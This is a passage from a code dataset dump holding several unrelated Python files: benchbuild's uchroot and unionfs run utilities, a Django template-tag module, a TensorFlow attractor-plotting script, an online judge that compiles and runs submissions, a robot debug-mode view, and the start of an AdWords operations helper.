\"\"\"Generate a single exit code from a list of RunInfo objects.\n\n Takes a list of RunInfos and returns the exit code that is furthest away\n from 0.\n\n Args:\n run_infos (t.List[RunInfo]): [description]\n\n Returns:\n int: [description]\n \"\"\"\n assert run_infos is not None\n\n if not hasattr(run_infos, \"__iter__\"):\n return run_infos.retcode\n\n rcs = [ri.retcode for ri in run_infos]\n max_rc = max(rcs)\n min_rc = min(rcs)\n if max_rc == 0:\n return min_rc\n return max_rc\n\n\n@contextmanager\ndef track_execution(cmd, project, experiment, **kwargs):\n \"\"\"Guard the execution of the given command.\n\n The given command (`cmd`) will be executed inside a database context.\n As soon as you leave the context we will commit the transaction.\n Any necessary modifications to the database can be identified inside\n the context with the RunInfo object.\n\n Args:\n cmd: The command we guard.\n project: The project we track for.\n experiment: The experiment we track for.\n\n Yields:\n RunInfo: A context object that carries the necessary\n database transaction.\n \"\"\"\n\n runner = RunInfo(cmd=cmd, project=project, experiment=experiment, **kwargs)\n yield runner\n runner.commit()\n\n\ndef run(command, retcode=0):\n \"\"\"Execute a plumbum command, depending on the user's settings.\n\n Args:\n command: The plumbum command to execute.\n \"\"\"\n return command & TEE(retcode=retcode)\n\n\nclass UchrootEC(enum.Enum):\n MNT_FAILED = 255\n MNT_PROC_FAILED = 254\n MNT_DEV_FAILED = 253\n MNT_SYS_FAILED = 252\n MNT_PTS_FAILED = 251\n\n\ndef retry(pb_cmd, retries=0, max_retries=10, retcode=0, retry_retcodes=None):\n try:\n run(pb_cmd, retcode)\n except ProcessExecutionError as proc_ex:\n new_retcode = proc_ex.retcode\n if retries > max_retries:\n LOG.error(\"Retried %d times. No change. 
Abort\", retries)\n raise\n\n if new_retcode in retry_retcodes:\n retry(\n pb_cmd,\n retries=retries + 1,\n max_retries=max_retries,\n retcode=retcode,\n retry_retcodes=retry_retcodes)\n else:\n raise\n\n\ndef uretry(cmd, retcode=0):\n retry(\n cmd,\n retcode=retcode,\n retry_retcodes=[\n UchrootEC.MNT_PROC_FAILED.value, UchrootEC.MNT_DEV_FAILED.value,\n UchrootEC.MNT_SYS_FAILED.value, UchrootEC.MNT_PTS_FAILED.value\n ])\n\n\ndef uchroot_no_args():\n \"\"\"Return the uchroot command without any customizations.\"\"\"\n from benchbuild.utils.cmd import uchroot as uchrt\n\n prefixes = CFG[\"container\"][\"prefixes\"].value()\n p_paths, p_libs = uchroot_env(prefixes)\n uchrt = with_env_recursive(\n uchrt,\n LD_LIBRARY_PATH=list_to_path(p_libs),\n PATH=list_to_path(p_paths))\n\n return uchrt\n\n\ndef uchroot_no_llvm(*args, **kwargs):\n \"\"\"\n Return a customizable uchroot command.\n\n The command will be executed inside a uchroot environment.\n\n Args:\n args: List of additional arguments for uchroot (typical: mounts)\n Return:\n chroot_cmd\n \"\"\"\n uid = kwargs.pop('uid', 0)\n gid = kwargs.pop('gid', 0)\n\n uchroot_cmd = uchroot_no_args()\n uchroot_cmd = uchroot_cmd[\"-C\", \"-w\", \"/\", \"-r\", os.path.abspath(\".\")]\n uchroot_cmd = uchroot_cmd[\"-u\", str(uid), \"-g\", str(gid), \"-E\", \"-A\"]\n return uchroot_cmd[args]\n\n\ndef uchroot_mounts(prefix, mounts):\n \"\"\"\n Compute the mountpoints of the current user.\n\n Args:\n prefix: Define where the job was running if it ran on a cluster.\n mounts: All mounts the user currently uses in his file system.\n Return:\n mntpoints\n \"\"\"\n i = 0\n mntpoints = []\n for mount in mounts:\n if not isinstance(mount, dict):\n mntpoint = \"{0}/{1}\".format(prefix, str(i))\n mntpoints.append(mntpoint)\n i = i + 1\n return mntpoints\n\n\ndef _uchroot_mounts(prefix, mounts, uchrt):\n i = 0\n new_uchroot = uchrt\n mntpoints = []\n for mount in mounts:\n src_mount = mount\n if isinstance(mount, dict):\n src_mount = mount[\"src\"]\n tgt_mount = mount[\"tgt\"]\n else:\n tgt_mount = \"{0}/{1}\".format(prefix, str(i))\n i = i + 1\n mkdir(\"-p\", tgt_mount)\n new_uchroot = new_uchroot[\"-M\", \"{0}:/{1}\".format(\n src_mount, tgt_mount)]\n mntpoints.append(tgt_mount)\n return new_uchroot, mntpoints\n\n\ndef uchroot_env(mounts):\n \"\"\"\n Compute the environment of the change root for the user.\n\n Args:\n mounts: The mountpoints of the current user.\n Return:\n paths\n ld_libs\n \"\"\"\n f_mounts = [m.strip(\"/\") for m in mounts]\n\n ld_libs = [\"/{0}/lib\".format(m) for m in f_mounts]\n ld_libs.extend([\"/{0}/lib64\".format(m) for m in f_mounts])\n\n paths = [\"/{0}/bin\".format(m) for m in f_mounts]\n paths.extend([\"/{0}/sbin\".format(m) for m in f_mounts])\n paths.extend([\"/{0}\".format(m) for m in f_mounts])\n return paths, ld_libs\n\n\ndef with_env_recursive(cmd, **envvars):\n \"\"\"\n Recursively updates the environment of cmd and all its subcommands.\n\n Args:\n cmd - A plumbum command-like object\n **envvars - The environment variables to update\n\n Returns:\n The updated command.\n \"\"\"\n from plumbum.commands.base import BoundCommand, BoundEnvCommand\n if isinstance(cmd, BoundCommand):\n cmd.cmd = with_env_recursive(cmd.cmd, **envvars)\n elif isinstance(cmd, BoundEnvCommand):\n cmd.envvars.update(envvars)\n cmd.cmd = with_env_recursive(cmd.cmd, **envvars)\n return cmd\n\n\ndef uchroot_with_mounts(*args, **kwargs):\n \"\"\"Return a uchroot command with all mounts enabled.\"\"\"\n uchroot_cmd = uchroot_no_args(*args, **kwargs)\n 
uchroot_cmd, mounts = \\\n _uchroot_mounts(\"mnt\", CFG[\"container\"][\"mounts\"].value(), uchroot_cmd)\n paths, libs = uchroot_env(mounts)\n\n prefixes = CFG[\"container\"][\"prefixes\"].value()\n p_paths, p_libs = uchroot_env(prefixes)\n\n uchroot_cmd = with_env_recursive(\n uchroot_cmd,\n LD_LIBRARY_PATH=list_to_path(libs + p_libs),\n PATH=list_to_path(paths + p_paths))\n return uchroot_cmd\n\n\ndef uchroot(*args, **kwargs):\n \"\"\"\n Return a customizable uchroot command.\n\n Args:\n args: List of additional arguments for uchroot (typical: mounts)\n Return:\n chroot_cmd\n \"\"\"\n mkdir(\"-p\", \"llvm\")\n uchroot_cmd = uchroot_no_llvm(*args, **kwargs)\n uchroot_cmd, mounts = _uchroot_mounts(\n \"mnt\", CFG[\"container\"][\"mounts\"].value(), uchroot_cmd)\n paths, libs = uchroot_env(mounts)\n p_paths, p_libs = uchroot_env(CFG[\"container\"][\"prefixes\"].value())\n\n uchroot_cmd = uchroot_cmd.with_env(\n LD_LIBRARY_PATH=list_to_path(libs + p_libs),\n PATH=list_to_path(paths + p_paths))\n return uchroot_cmd[\"--\"]\n\n\ndef in_builddir(sub='.'):\n \"\"\"\n Decorate a project phase with a local working directory change.\n\n Args:\n sub: An optional subdirectory to change into.\n \"\"\"\n from functools import wraps\n from os import path\n\n def wrap_in_builddir(func):\n \"\"\"Wrap the function for the new build directory.\"\"\"\n\n @wraps(func)\n def wrap_in_builddir_func(self, *args, **kwargs):\n \"\"\"The actual function inside the wrapper for the new builddir.\"\"\"\n p = path.abspath(path.join(self.builddir, sub))\n try:\n with local.cwd(p):\n return func(self, *args, **kwargs)\n except FileNotFoundError:\n LOG.debug(\"Chdir to %s failed. Directory does not exist.\", p)\n\n return wrap_in_builddir_func\n\n return wrap_in_builddir\n\n\ndef unionfs_set_up(ro_base, rw_image, mountpoint):\n \"\"\"\n Setup a unionfs via unionfs-fuse.\n\n Args:\n ro_base: base_directory of the project\n rw_image: virtual image of actual file system\n mountpoint: location where ro_base and rw_image merge\n \"\"\"\n if not os.path.exists(mountpoint):\n mkdir(\"-p\", mountpoint)\n if not os.path.exists(ro_base):\n LOG.error(\"Base dir does not exist: '%s'\", ro_base)\n raise ValueError(\"Base directory does not exist\")\n if not os.path.exists(rw_image):\n LOG.error(\"Image dir does not exist: '%s'\", ro_base)\n raise ValueError(\"Image directory does not exist\")\n\n from benchbuild.utils.cmd import unionfs as unionfs_cmd\n ro_base = os.path.abspath(ro_base)\n rw_image = os.path.abspath(rw_image)\n mountpoint = os.path.abspath(mountpoint)\n return unionfs_cmd[\"-f\", \"-o\", \"auto_unmount,allow_other,cow\",\n rw_image + \"=RW:\" + ro_base + \"=RO\", mountpoint]\n\n\ndef unionfs_is_active(root):\n import psutil\n\n real_root = os.path.realpath(root)\n for part in psutil.disk_partitions(all=True):\n if os.path.commonpath([part.mountpoint, real_root]) == real_root:\n if part.fstype in [\"fuse.unionfs\", \"fuse.unionfs-fuse\"]:\n return True\n return False\n\n\nclass UnmountError(BaseException):\n pass\n\n\ndef unionfs(base_dir='./base',\n image_dir='./image',\n image_prefix=None,\n mountpoint='./union'):\n \"\"\"\n Decorator for the UnionFS feature.\n\n This configures a unionfs for projects. The given base_dir and/or image_dir\n are layered as follows:\n image_dir=RW:base_dir=RO\n All writes go to the image_dir, while base_dir delivers the (read-only)\n versions of the rest of the filesystem.\n\n The unified version will be provided in the project's builddir. 
Unmounting\n is done as soon as the function completes.\n\n Args:\n base_dir: The unpacked container of a project delivered by a method\n out of the container utils.\n image_dir: Virtual image of the actual file system represented by the\n build_dir of a project.\n image_prefix: Useful prefix if the projects run on a cluster,\n to identify where the job came from and where it runs.\n mountpoint: Location where the filesystems merge, currently per default\n as './union'.\n \"\"\"\n from functools import wraps\n\n def update_cleanup_paths(new_path):\n \"\"\"\n Add the new path to the list of paths to clean up afterwards.\n\n Args:\n new_path: Path to the directory that needs to be cleaned up.\n \"\"\"\n cleanup_dirs = settings.CFG[\"cleanup_paths\"].value()\n cleanup_dirs = set(cleanup_dirs)\n cleanup_dirs.add(new_path)\n cleanup_dirs = list(cleanup_dirs)\n settings.CFG[\"cleanup_paths\"] = cleanup_dirs\n\n def is_outside_of_builddir(project, path_to_check):\n \"\"\"Check if a project lies outside of its expected directory.\"\"\"\n bdir = project.builddir\n cprefix = os.path.commonprefix([path_to_check, bdir])\n return cprefix != bdir\n\n def wrap_in_union_fs(func):\n \"\"\"\n Function that wraps a given function inside the file system.\n\n Args:\n func: The function that needs to be wrapped inside the union fs.\n Return:\n The file system with the function wrapped inside.\n \"\"\"\n nonlocal image_prefix\n\n @wraps(func)\n def wrap_in_union_fs_func(project, *args, **kwargs):\n \"\"\"\n Wrap the func in the UnionFS mount stack.\n\n We make sure that the mount points all exist and stack up the\n directories for the unionfs. All directories outside of the default\n build environment are tracked for deletion.\n \"\"\"\n container = project.container\n abs_base_dir = os.path.abspath(container.local)\n nonlocal image_prefix\n if image_prefix is not None:\n image_prefix = os.path.abspath(image_prefix)\n rel_prj_builddir = os.path.relpath(\n project.builddir, str(settings.CFG[\"build_dir\"]))\n abs_image_dir = os.path.abspath(\n os.path.join(image_prefix, rel_prj_builddir, image_dir))\n\n if is_outside_of_builddir(project, abs_image_dir):\n update_cleanup_paths(abs_image_dir)\n else:\n abs_image_dir = os.path.abspath(\n os.path.join(project.builddir, image_dir))\n abs_mount_dir = os.path.abspath(\n os.path.join(project.builddir, mountpoint))\n if not os.path.exists(abs_base_dir):\n mkdir(\"-p\", abs_base_dir)\n if not os.path.exists(abs_image_dir):\n mkdir(\"-p\", abs_image_dir)\n if not os.path.exists(abs_mount_dir):\n mkdir(\"-p\", abs_mount_dir)\n\n unionfs_cmd = unionfs_set_up(abs_base_dir, abs_image_dir,\n abs_mount_dir)\n project_builddir_bak = project.builddir\n project.builddir = abs_mount_dir\n\n proc = unionfs_cmd.popen()\n while (not unionfs_is_active(root=abs_mount_dir)) and \\\n (proc.poll() is None):\n pass\n\n ret = None\n if proc.poll() is None:\n try:\n with local.cwd(abs_mount_dir):\n ret = func(project, *args, **kwargs)\n finally:\n project.builddir = project_builddir_bak\n\n from signal import SIGINT\n is_running = proc.poll() is None\n while unionfs_is_active(root=abs_mount_dir) and is_running:\n try:\n proc.send_signal(SIGINT)\n proc.wait(timeout=3)\n except subprocess.TimeoutExpired:\n proc.kill()\n is_running = False\n LOG.debug(\"Unionfs shut down.\")\n\n if unionfs_is_active(root=abs_mount_dir):\n raise UnmountError()\n\n return ret\n\n return wrap_in_union_fs_func\n\n return wrap_in_union_fs\n\n\ndef store_config(func):\n \"\"\"Decorator for storing the configuration in 
the project's builddir.\"\"\"\n from functools import wraps\n\n @wraps(func)\n def wrap_store_config(self, *args, **kwargs):\n \"\"\"Wrapper that contains the actual storage call for the config.\"\"\"\n p = os.path.abspath(os.path.join(self.builddir))\n CFG.store(os.path.join(p, \".benchbuild.yml\"))\n return func(self, *args, **kwargs)\n\n return wrap_store_config\n","sub_path":"benchbuild/utils/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":23145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"96252548","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/pjs/python-modules/webutils/djtools/templatetags/djtools_util.py\n# Compiled at: 2016-05-17 14:52:55\nfrom django import template\nregister = template.Library()\n\n@register.filter\ndef tabularize(value, cols):\n \"\"\"\n modifies a list to become a list of lists \n eg [1,2,3,4] becomes [[1,2], [3,4]] with an argument of 2\n Taken from django user group\n\n Usage:\n {% for row in object_list|tabularize:\"4\" %}\n {% for obj in row %}\n ....\n {% endfor %}\n {% endfor %}\n \"\"\"\n try:\n cols = int(cols)\n except ValueError:\n return [\n value]\n\n return map(*([None] + [ value[i::cols] for i in range(0, cols) ]))\n\n\nclass MapTranslateNode(template.Node):\n\n def __init__(self, data, src_variables, variable_name):\n self.data = data\n self.src_variables = src_variables\n self.variable_name = variable_name\n\n def render(self, context):\n from webutils.helpers import map_translate\n data = template.Variable(self.data).resolve(context)\n src_variables = [ template.Variable(x).resolve(context) for x in self.src_variables ]\n new_data = map_translate(data, *src_variables)\n context[self.variable_name] = new_data\n return ''\n\n\n@register.tag\ndef map_translate(parser, token):\n \"\"\" Used to templatize custom data strings. 
See \n webutils.helpers.map_translate for more details.\n \n Usage:\n \n {% map_translate data_string, source,extra,fields as result_name %}\n \n Will run data_string through map_translate using source (plus extra\n fields) and give the result in the template context as \"result_name\"\n \"\"\"\n try:\n name, data, src_variables, as_, variable_name = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError('bad arguments for %r' % token.split_contents()[0])\n\n return MapTranslateNode(data, src_variables.split(','), variable_name)","sub_path":"pycfiles/webutils-0.9.11.tar/djtools_util.py","file_name":"djtools_util.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139966029","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nfrom tqdm import tqdm\nimport bounds\nimport nested_utils as nested\nimport distribution_utils as dists\nimport runners\nfrom flags_config import config\nfrom mpl_toolkits.mplot3d import Axes3D\n\nFIG_DPI = 300\nalpha = 2.\nparallel_iterations=30\nswap_memory=True\n\nmean = np.array([-1.0736032, -1.0666735, 23.519363],dtype=np.float32)\nstd = np.array([7.8522167, 8.973377 , 8.675985],dtype=np.float32)\n\nconfig.num_samples = 1\nconfig.batch_size = 1\nconfig.logdir=\"./chkpts/VDRNN_normalized-elbo-600-0-obs123_noise0.0_10-normalize_data-True-raw_sigma_bias-0.25-stochastic-True-sigma_max-10.0\"\n\ntf.Graph().as_default()\nglobal_step = tf.train.get_or_create_global_step()\ninputs, targets, lengths, model = runners.create_dataset_and_model(config, \n shuffle=False,\n repeat=False)\n\nwith tf.name_scope(\"Generative_cell\"):\n max_seq_length = 2000\n ta_names_ = ['gen_data']\n tas_ = [tf.TensorArray(tf.float32, max_seq_length, name='%s_ta' % n)\n for n in ta_names_]\n \n tmp = tf.constant([-2.0780482 , 2.2406886 , 27.08631],dtype=tf.float32)\n# tmp = tf.constant([-6.1996655, -3.5407534, 27.89102],dtype=tf.float32)\n if config.normalize_data:\n tmp = (tmp-mean)/std\n init_states_ = 1*tf.expand_dims(tmp, axis=0)\n t0 = tf.constant(0, tf.int32)\n \n def while_predicate_(t, *unused_args):\n return t < max_seq_length\n def while_step(t, while_inputs, tas):\n next_state, _ = model.prior.binn(while_inputs)\n ta_updates_ = [next_state]\n new_tas = [ta.write(t, x) for ta, x in zip(tas, ta_updates_)]\n return t + 1, next_state, new_tas\n _, _, tas_ = tf.while_loop(while_predicate_,\n while_step,\n loop_vars=(t0, init_states_, tas_),\n parallel_iterations=parallel_iterations,\n swap_memory=swap_memory)\n gen_data = [x.stack() for x in tas_][0]\n \nsaver = tf.train.Saver()\nsess = tf.train.SingularMonitoredSession()\nrunners.wait_for_checkpoint(saver, sess, config.logdir) \nstep = sess.run(global_step)\n\ninp_np, tar_np, len_np, gen_np =\\\n sess.run([inputs,targets, lengths, gen_data])\ninp_np = np.squeeze(inp_np)\ntar_np = np.squeeze(tar_np)\n#gen_np = np.squeeze(gen_np)\n\n\nfigname = config.model_name + \", \"+config.dataset_path.split(\"/\")[2]\nFIG_DPI = 100\n\nplt.figure(figsize=(1920/FIG_DPI, 1080/FIG_DPI), dpi=FIG_DPI)\nfor d_i in range(3):\n plt.plot(gen_np[:1000,0,d_i])\nplt.title(figname)\nplt.savefig(\"./results/\"+figname+\".png\", dpi=FIG_DPI)\n\n# Attractor\nfig = plt.figure(figsize=(1920/FIG_DPI, 1080/FIG_DPI), 
dpi=FIG_DPI)\nax=fig.gca(projection='3d')\nline1,=ax.plot(gen_np[:1000,0,0],gen_np[:1000,0,1],gen_np[:1000,0,2],'r')\nax.set_xlabel('$x_1$');ax.set_ylabel('$x_2$');ax.set_zlabel('$x_3$')\nplt.title(figname)\n#plt.savefig(\"./results/\"+figname+\"_attractor.png\", dpi=FIG_DPI)\nplt.savefig(\"./results/\"+os.path.basename(config.logdir)+\".png\", dpi=FIG_DPI)\nplt.show()\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"8499189","text":"import itertools\nimport os\nimport os.path\nimport shlex\nimport subprocess\nimport threading\nimport time\n\nfrom app import app\n\n\nALLOWED_EXTENSIONS = ['java', 'c', 'cpp', 'py', 'go']\nCOMPILE_COMMAND = {\n 'java': 'javac {0}.java',\n 'py': None,\n 'c': 'gcc {0}.c -o {0}',\n 'cpp': 'g++ {0}.cpp -o {0}',\n 'go': 'go build -o {0} {0}.go'\n}\nRUN_COMMAND = {\n 'java': 'java -cp {0}/ {1}',\n 'py': 'python {0}/{1}.py',\n 'c': '{0}/{1}',\n 'cpp': '{0}/{1}',\n 'go': '{0}/{1}'\n}\nTIMEOUT_MULTIPLIER = {\n 'java': 1.5,\n 'py': 2,\n 'c': 1,\n 'cpp': 1,\n 'go': 1\n}\nCOMPILATION_ERROR = 1\nCOMPILATION_SUCCESS = 2\nRUNTIME_ERROR = 3\nTIMELIMIT_EXCEEDED = 4\nWRONG_ANSWER = 5\nCORRECT_ANSWER = 6\n\n\ndef allowed_filetype(filename):\n return ('.' in filename and\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS)\n\n\ndef directory_for_submission(submission):\n return os.path.join(\n app.config['DATA_FOLDER'], 'submits', str(submission.job))\n\n\ndef directory_for_problem(submission):\n return os.path.join(app.config['DATA_FOLDER'], 'problems', str(submission.pid))\n\n\ndef evaluate(submission, uploaded_file, time_limit=10):\n \"\"\"Attempts to compile (if necessary) then execute a given file.\n\n :param submission: the newly created submission\n :param uploaded_file: the uploaded file\n :return: the status of the submission (one of the status constants above)\n \"\"\"\n directory = directory_for_submission(submission)\n os.mkdir(directory)\n uploaded_file.save(os.path.join(directory, uploaded_file.filename))\n status = compile_submission(submission, uploaded_file)\n if status == COMPILATION_SUCCESS:\n status = execute_submission(submission, uploaded_file, time_limit)\n return status\n\n\ndef compile_submission(submission, uploaded_file):\n \"\"\"Compile the submission.\"\"\"\n directory = directory_for_submission(submission)\n filename = uploaded_file.filename\n name, ext = filename.rsplit('.', 1)\n # Don't compile file types that we can't compile.\n if COMPILE_COMMAND[ext] is None:\n return COMPILATION_SUCCESS\n result = subprocess.call(\n shlex.split(COMPILE_COMMAND[ext].format(os.path.join(directory, name))),\n stderr=open(os.path.join(directory, 'error.txt'), 'w')\n )\n if result == 0:\n return COMPILATION_SUCCESS\n else:\n submission.update_status('compile')\n submission.emit_status('compile', -1)\n return COMPILATION_ERROR\n\n\ndef execute_submission(submission, uploaded_file, time_limit):\n \"\"\"Run the submission.\n\n TODO(djshuckerow): This method magically got out-of-hand. Refactor.\n This method:\n 1. detects all the input files associated with this problem.\n 2. runs the submission with each input file\n 3. checks the performance of the submission for errors (TLE, RTE, etc)\n 4. 
compares the output against correct test output\n \"\"\"\n # Initial setup\n problem = submission.get_problem()\n problem_directory = directory_for_problem(submission)\n submission_directory = directory_for_submission(submission)\n filename = uploaded_file.filename\n name, ext = filename.rsplit('.', 1)\n input_path = os.path.join(problem_directory, 'in')\n output_path = os.path.join(problem_directory, 'out')\n\n # Iterate over all the input files.\n for fname in os.listdir(input_path):\n f = os.path.join(input_path, fname)\n if os.path.isfile(f):\n # Prepare to run the test file.\n test_number = int(fname.split('.')[0].strip('in'))\n out_file = 'out{0}.txt'.format(test_number)\n submission.emit_status('running', test_number)\n max_runtime = time_limit * TIMEOUT_MULTIPLIER[ext]\n execution = JudgementThread(\n submission, uploaded_file, f, out_file, max_runtime)\n start_time = time.time()\n execution.start()\n execution.join(max_runtime)\n\n # Check the execution for timeouts and runtime errors.\n if time.time() >= start_time + max_runtime:\n execution.process.kill()\n submission.update_status('timeout')\n submission.emit_status('timeout', test_number)\n return TIMELIMIT_EXCEEDED\n elif execution.process.poll() != 0:\n submission.update_status('runtime')\n submission.emit_status('runtime', test_number)\n return RUNTIME_ERROR\n result_path = os.path.join(submission_directory, 'out')\n\n # The execution is completed. Check its correctness.\n with open(os.path.join(output_path, out_file)) as correct_result, \\\n open(os.path.join(result_path, out_file)) as submission_result:\n correct_lines = correct_result.readlines()\n submission_lines = submission_result.readlines()\n if len(submission_lines) != len(correct_lines):\n submission.update_status('wrong')\n submission.emit_status('incorrect', test_number)\n return WRONG_ANSWER\n\n # Use itertools.izip instead of zip to save memory.\n for gl, sl in itertools.izip(correct_lines, submission_lines):\n if gl.rstrip('\\r\\n') != sl.rstrip('\\r\\n'):\n submission.update_status('wrong')\n submission.emit_status('incorrect', test_number)\n return WRONG_ANSWER\n\n # The answer is correct if all the tests complete without any failure.\n submission.update_status('good')\n submission.emit_status('correct', test_number)\n return CORRECT_ANSWER\n\n\nclass JudgementThread(threading.Thread):\n \"\"\"Pass judgement on a submission by running it on a thread.\n\n This runs a separate thread containing the submission in a subprocess.\n\n Timeout is tricky to handle -- thread.join(timeout) doesn't appear to\n work properly inside of Flask.\n \"\"\"\n\n def __init__(self, submit, uploaded_file, in_file, out_file, limit):\n \"\"\"Create the JudgementThread.\n\n :param submit: the newly created submission\n :param uploaded_file: the file uploaded from flask\n :param in_file: the input file that is going to be read in\n :param out_file: the output file that is going to be written to\n :param limit: the time limit for execution.\n \"\"\"\n threading.Thread.__init__(self)\n self.submit = submit\n self.uploaded_file = uploaded_file\n self.in_file = in_file\n self.out_file = out_file\n self.process = None\n self.limit = limit\n # Final setup.\n directory = directory_for_submission(submit)\n output_path = os.path.join(directory, 'out')\n if (not os.path.exists(output_path)):\n os.mkdir(output_path)\n\n def run(self):\n \"\"\"Execute a subprocess and keep the pointer to that subprocess.\"\"\"\n start_time = time.time()\n self.process = self.judge_as_subprocess()\n # 
TODO(djshuckerow): Get this thread to join() properly.\n while self.process.poll() is None:\n time.sleep(0.1)\n if time.time() > start_time + self.limit:\n # The try is to avoid a race condition where the process\n # finishes between the if and the kill statements.\n try:\n self.process.kill()\n except:\n pass\n\n def judge_as_subprocess(self):\n \"\"\"Run the program to judge as a subprocess.\n\n This routes the output to /data/submits/job/out. The input is read from\n the location at which it is supposed to be found:\n\n \n /data/problems/pid/in(test_num).txt.\n \n \"\"\"\n submit, uploaded_file = self.submit, self.uploaded_file\n in_file, out_file = self.in_file, self.out_file\n directory = directory_for_submission(submit)\n filename = uploaded_file.filename\n name, ext = filename.rsplit('.', 1)\n input_path = os.path.join(directory_for_problem(submit), 'in')\n output_path = os.path.join(directory, 'out')\n return subprocess.Popen(\n shlex.split(RUN_COMMAND[ext].format(directory, name, ext)),\n stdin=open(os.path.join(input_path, in_file)),\n stdout=open(os.path.join(output_path, out_file), 'w'),\n stderr=open(os.path.join(directory, 'error.txt'), 'w'))\n","sub_path":"auacm/app/modules/submission_manager/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":8474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"93187671","text":"\"\"\"connectionlist create debug mode\n\"\"\"\nimport logging.handlers\nimport requests\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import status\n\nfrom webapp.libs.get_available_port import GetAvailablePort\nfrom webapp.models import Operation, OperationHistory, Robot\nfrom webapp.views import walk, CELERY_APP\n\n# set logger\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('connectionlist_debug_mode')\n\n# create a file handler\nhandler = logging.handlers.RotatingFileHandler('connectionlist_debug_mode.log', maxBytes=10485760,\n backupCount=10, encoding='utf-8')\nhandler.setLevel(logging.INFO)\n\n# create a logging format\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\n\n# add the handlers to the logger\nlogger.addHandler(handler)\n\n\nclass CreateDebugMode(object):\n\n @staticmethod\n def validate_input_to_create_debug_mode(request_data):\n \"\"\"Debug Process\n\n Args:\n request: request data\n\n Returns:\n json:\n east (string): east port number\n west (string): west port number\n status (string): status code\n number (string): number of sequence\n stops (string): current sequence\n action (string): action type\n \"\"\"\n\n east, west = GetAvailablePort.get_available_port(request_data)\n logger.info('debug %s - %s', east, west)\n\n # Validate input\n if east is None:\n logger.error('debug: error:no east port number {} request:{}'.format(east, request_data))\n return Response('No east port number ' + str(east), content_type=\"text/plain\")\n\n if west is None:\n logger.error('debug: error:no west port number {} request:{}'.format(west, request_data))\n return Response('No west port number ' + str(west), content_type=\"text/plain\")\n\n # create debug mode\n CreateDebugMode.create_debug(request_data, east, west)\n\n logger.info('debug: response method return data: {}'.format(request_data))\n return Response(request_data, status=status.HTTP_200_OK)\n\n @staticmethod\n def create_debug(request_data, east, west):\n \"\"\"Create debug Process in database\n\n Args:\n 
request: request data\n east(string): east's port from debug()\n west(string): west's port from debug()\n \"\"\"\n\n # Validate input\n if 'number' in request_data and 'stops' in request_data:\n action = request_data['action']\n number = request_data['number']\n stops = request_data['stops']\n\n else:\n number = None\n stops = None\n\n if stops and number:\n payload = {'east': east.number, 'west': west.number, 'action': str(action), 'stops': str(stops),\n 'no': str(number)}\n\n else:\n return_data = ({'status': 'error', 'error': 'Invalid Debug Input'})\n return Response(return_data, status=status.HTTP_200_OK)\n\n # Validate using dummy\n if walk.is_dummy():\n resp = walk.debug(payload)\n\n else:\n resp = requests.post(CELERY_APP + '/debug', data=payload)\n\n uuid = resp.text\n logger.info('%s %s E%s W%s stops:%s no:%s', uuid, action, east.number, west.number, stops, number)\n operations = Operation.objects.all()\n robotnumber = ''\n\n robots = Robot.objects.all()\n for r in robots:\n robotnumber = r.robot_number\n\n if len(operations) > 0:\n operations.delete()\n operations = Operation.objects.create(uuid=uuid, robotnumber=robotnumber, status='pending',\n request=str(payload))\n operations.save()\n\n else:\n operations = Operation.objects.create(robotnumber=robotnumber, uuid=uuid, status='pending',\n request=str(payload))\n operations.save()\n\n operationhistorys = OperationHistory.objects.create(robotnumber=robotnumber, uuid=uuid, status='pending',\n request=str(payload))\n operationhistorys.save()","sub_path":"backend/webapp/libs/connectionlist_debug_mode.py","file_name":"connectionlist_debug_mode.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"17550724","text":"import logging\nimport uuid\n\nfrom .. 
import utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef add_label_operation(label):\n yield {\n 'xsi_type': 'LabelOperation',\n 'operator': 'ADD',\n 'operand': {\n 'xsi_type': 'TextLabel',\n 'name': label\n }\n }\n\n\ndef add_adgroup_label_operation(adgroup_id, label_id):\n yield {\n 'xsi_type': 'AdGroupLabelOperation',\n 'operator': 'ADD',\n 'operand': {\n 'xsi_type': 'AdGroupLabel',\n 'adGroupId': adgroup_id,\n 'labelId': label_id\n }\n }\n\n\ndef set_adgroup_name_operation(adgroup_id, name):\n yield {\n 'xsi_type': 'AdGroupOperation',\n 'operator': 'SET',\n 'operand': {\n 'xsi_type': 'AdGroup',\n 'id': adgroup_id,\n 'name': name\n }\n }\n\n\ndef apply_new_budget(campaign_id, amount=None, budget_id=None, id_builder=None):\n if not budget_id:\n logger.debug(\"Create a budget using 'amount' %s\" % amount)\n if not id_builder:\n raise RuntimeError(\"'id_builder' callable should be provided for budgets to be created\")\n budget_id = id_builder()\n yield add_budget(amount, budget_id)\n\n logger.debug(\"Apply budget '%s' to campaign '%s'\" % (budget_id, campaign_id))\n yield set_campaign_budget(budget_id, campaign_id)\n\n\ndef add_ad(adgroup_id: 'Long',\n headline1: 'String',\n headline2: 'String',\n description: 'String',\n urls: 'String',\n ad_id: 'Long' = None,\n adtype: 'String' = 'ExpandedTextAd',\n **kwargs):\n ad_dict = build_ad(headline1, headline2, description, urls, ad_id, adtype)\n operation = {\n 'xsi_type': 'AdGroupAdOperation',\n 'operand': {\n # 